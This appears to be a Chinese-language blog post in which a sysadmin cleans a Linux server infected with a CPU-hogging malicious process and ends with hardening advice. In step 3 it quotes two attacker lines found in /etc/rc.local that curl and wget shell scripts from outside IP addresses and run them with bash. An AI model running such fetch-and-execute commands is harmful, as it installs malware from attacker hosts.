快下班,问题来了

记一次快下班的记录

快下班了,好友发来了一张照片,如下:
CPU利用率很高 800%爆了

中毒了,没问题,肯定是!!!

开始qq对话解决

**有监控吗,快速查看流量图,看看是否发包或者被发包?**
答曰:没有监控
**那查看一下交换机的接口流量呢?**
答曰:交换机是傻瓜二层的
**那看看防火墙的呢?**
查看流量并没有什么影响。

CPU利用率很高 800%爆了

实在是解决太慢了,而对方的机器是内容,最后通过内容的某太机器,我远程朋友的qq桌面,远程服务器,10分钟后终于连接上了。

开始远程解决问题

1、find / -name cranber* #查看占用cpu文件的位置
2、mv /cranber* /cranber.bak 
                #将发包文件移动位置,让程序启动的时候找不到它。
                本次的文件是在/ 根目录下,具体文件名我就不写出来了。
3、cat /etc/rc.local  
                #查看系统启动文件有没有异常的启动项,结果发现了,如下:
                    #curl http://207.246.68.21/rootv2.sh > /etc/root.sh ; wget -P /etc http://207.246.68.21/rootv2.sh ; rm -rf /etc/root.sh.* ; bash /etc/root.sh 
                    #curl http://172.96.252.86/rootv3.sh > /etc/root.sh ; wget -O /etc/root.sh http://172.96.252.86/rootv3.sh ; bash /etc/root.sh 
4、先将这两行 注释掉再说。
5、查看步骤3 下载下来的root开头的文件
            find / -name root*
            显示都是以root.sh开头的 ,如:root.sh、root.sh.1、root.sh.2、
            目录都在/etc下边
6、移动root.sh 开头的文件到随便一个目录
            mkdir /root/bak
            mv /etc/root.sh* /root/bak
7、重启服务器
            目的是通过重启服务器关掉病毒进程,同时查看还有没有别的病毒脚本,在启动的时候跟着系统启动。
8、系统起来之后
            通过top命令查看,系统已经恢复正常,没有什么异常了。又观察了10分钟,并没有什么问题了。
9、修改密码
             这时候应该及时修改 系统密码、数据库密码、以及相关的密码。
10、备份数据
            备份相关的重要数据,以便系统如果被黑到无法恢复的地步,还有后手。

总结

初步判断本次中毒原因为密码被漏扫,暴力破解了。

日常运维
        必须有监控
        必须有监控报警
        必须有密码复杂机制
        必须有密码更新机制
        必须有运维技术能力
        (最关键:人外有人、天外有天、还得有人脉)